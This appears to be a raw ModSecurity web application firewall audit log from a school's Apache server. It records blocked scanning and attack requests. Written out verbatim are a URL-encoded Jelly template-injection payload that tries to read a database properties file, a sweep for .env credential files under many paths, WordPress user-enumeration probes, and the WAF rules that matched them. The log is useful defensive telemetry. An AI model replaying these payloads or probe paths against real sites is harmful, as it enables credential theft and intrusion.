Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749159798300725 725 (- - -) Stopwatch2: 1749159798300725 725; combined=275, p1=241, p2=0, p3=0, p4=0, p5=33, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc8b9d0b-Z-- --c19aea22-A-- [06/Jun/2025:04:58:21 +0700] aEIS_eJsrKcXA4Tjex0GXQAAAEU 103.236.140.4 47732 103.236.140.4 8181 --c19aea22-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.189.154.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.189.154.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c19aea22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c19aea22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749160701692529 3347 (- - -) Stopwatch2: 1749160701692529 3347; combined=1413, p1=495, p2=871, p3=0, p4=0, p5=47, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c19aea22-Z-- --70f96307-A-- [06/Jun/2025:05:00:32 +0700] aEITgOJsrKcXA4Tjex0GYAAAAEs 103.236.140.4 47758 103.236.140.4 8181 --70f96307-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.61.91.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.61.91.231 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --70f96307-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70f96307-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749160832685151 3189 (- - -) Stopwatch2: 1749160832685151 3189; combined=1370, p1=481, p2=859, p3=0, p4=0, p5=30, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70f96307-Z-- --13c66c12-A-- [06/Jun/2025:05:23:35 +0700] aEIY5-JsrKcXA4Tjex0GdAAAAE8 103.236.140.4 47840 103.236.140.4 8181 --13c66c12-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173412650 --13c66c12-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13c66c12-E-- --13c66c12-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749162215362546 3964 (- - -) Stopwatch2: 1749162215362546 3964; combined=1698, p1=535, p2=1121, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13c66c12-Z-- --c19aea22-A-- [06/Jun/2025:05:38:22 +0700] aEIcXvHwHPygw9BuFzQ1sQAAAIE 103.236.140.4 47908 103.236.140.4 8181 --c19aea22-B-- PUT /testing-put.txt HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.50.16.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.50.16.252 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1 Content-Type: text/plain --c19aea22-C-- 2y6kdN9YivKg61kzeUyAqhxUspE --c19aea22-F-- HTTP/1.1 405 Method Not Allowed Allow: POST,OPTIONS,HEAD,GET,TRACE Content-Length: 220 Connection: close Content-Type: text/html; charset=iso-8859-1 --c19aea22-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749163102347976 4695 (- - -) Stopwatch2: 1749163102347976 4695; combined=2839, p1=672, p2=2069, p3=33, p4=35, p5=29, sr=145, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c19aea22-Z-- --4e6e9b1c-A-- [06/Jun/2025:05:45:37 +0700] aEIeEdKrQJH3faNNWWAW6QAAAM0 103.236.140.4 47996 103.236.140.4 8181 --4e6e9b1c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 209.145.54.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 209.145.54.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4e6e9b1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e6e9b1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749163537474509 3206 (- - -) Stopwatch2: 1749163537474509 3206; combined=1293, p1=442, p2=821, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e6e9b1c-Z-- --63c2d956-A-- [06/Jun/2025:05:49:53 +0700] aEIfEeJsrKcXA4Tjex0GhAAAAFQ 103.236.140.4 48064 103.236.140.4 8181 --63c2d956-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236130 --63c2d956-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --63c2d956-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163793417572 555 (- - -) Stopwatch2: 1749163793417572 555; combined=196, p1=169, p2=0, p3=0, p4=0, p5=27, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63c2d956-Z-- --f1ed9f03-A-- [06/Jun/2025:05:49:53 +0700] aEIfEeJsrKcXA4Tjex0GhwAAAEA 103.236.140.4 48070 103.236.140.4 8181 --f1ed9f03-B-- GET /portal/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412748 --f1ed9f03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f1ed9f03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163793965552 667 (- - -) Stopwatch2: 1749163793965552 667; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1ed9f03-Z-- --7b4e0b1f-A-- [06/Jun/2025:05:49:54 +0700] aEIfEuJsrKcXA4Tjex0GiAAAAEE 103.236.140.4 48078 103.236.140.4 8181 --7b4e0b1f-B-- GET /env/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236136 --7b4e0b1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7b4e0b1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163794146505 569 (- - -) Stopwatch2: 1749163794146505 569; combined=249, p1=224, p2=0, p3=0, p4=0, p5=25, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b4e0b1f-Z-- --1b2f544f-A-- [06/Jun/2025:05:49:54 +0700] aEIfEtKrQJH3faNNWWAW7gAAANc 103.236.140.4 48082 103.236.140.4 8181 --1b2f544f-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412751 --1b2f544f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1b2f544f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163794327261 766 (- - -) Stopwatch2: 1749163794327261 766; combined=287, p1=253, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b2f544f-Z-- --a391b352-A-- [06/Jun/2025:05:49:54 +0700] aEIfEtKrQJH3faNNWWAW7wAAAMA 103.236.140.4 48086 103.236.140.4 8181 --a391b352-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236139 --a391b352-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a391b352-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163794508005 695 (- - -) Stopwatch2: 1749163794508005 695; combined=277, p1=244, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a391b352-Z-- --8c77620b-A-- [06/Jun/2025:05:49:54 +0700] aEIfEtKrQJH3faNNWWAW8AAAAMM 103.236.140.4 48090 103.236.140.4 8181 --8c77620b-B-- GET /dev/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412754 --8c77620b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8c77620b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163794688806 673 (- - -) Stopwatch2: 1749163794688806 673; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c77620b-Z-- --b3326f0f-A-- [06/Jun/2025:05:49:54 +0700] aEIfEtKrQJH3faNNWWAW8QAAAMI 103.236.140.4 48094 103.236.140.4 8181 --b3326f0f-B-- GET /new/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236142 --b3326f0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b3326f0f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163794869588 668 (- - -) Stopwatch2: 1749163794869588 668; combined=252, p1=219, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3326f0f-Z-- --125f4d46-A-- [06/Jun/2025:05:49:55 +0700] aEIfE-JsrKcXA4Tjex0GiQAAAEQ 103.236.140.4 48098 103.236.140.4 8181 --125f4d46-B-- GET /new/.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412757 --125f4d46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --125f4d46-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163795050402 741 (- - -) Stopwatch2: 1749163795050402 741; combined=318, p1=285, p2=0, p3=0, p4=0, p5=33, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --125f4d46-Z-- --9425cf16-A-- [06/Jun/2025:05:49:55 +0700] aEIfE9KrQJH3faNNWWAW8gAAAMY 103.236.140.4 48102 103.236.140.4 8181 --9425cf16-B-- GET /new/.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236145 --9425cf16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9425cf16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163795231324 674 (- - -) Stopwatch2: 1749163795231324 674; combined=251, p1=220, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9425cf16-Z-- --e7966018-A-- [06/Jun/2025:05:49:55 +0700] aEIfE9KrQJH3faNNWWAW8wAAAMc 103.236.140.4 48106 103.236.140.4 8181 --e7966018-B-- GET /new/.env.staging HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412760 --e7966018-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e7966018-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163795412153 694 (- - -) Stopwatch2: 1749163795412153 694; combined=297, p1=266, p2=0, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7966018-Z-- --59ddc75e-A-- [06/Jun/2025:05:49:56 +0700] aEIfFNKrQJH3faNNWWAW-gAAAM4 103.236.140.4 48110 103.236.140.4 8181 --59ddc75e-B-- GET /awstats/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236157 --59ddc75e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --59ddc75e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163796693747 662 (- - -) Stopwatch2: 1749163796693747 662; combined=256, p1=224, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59ddc75e-Z-- --2631e443-A-- [06/Jun/2025:05:49:56 +0700] aEIfFGaFzeU7VUj_TDFzzgAAABI 103.236.140.4 48126 103.236.140.4 8181 --2631e443-B-- GET /conf/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412772 --2631e443-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2631e443-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163796874647 715 (- - -) Stopwatch2: 1749163796874647 715; combined=288, p1=254, p2=0, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
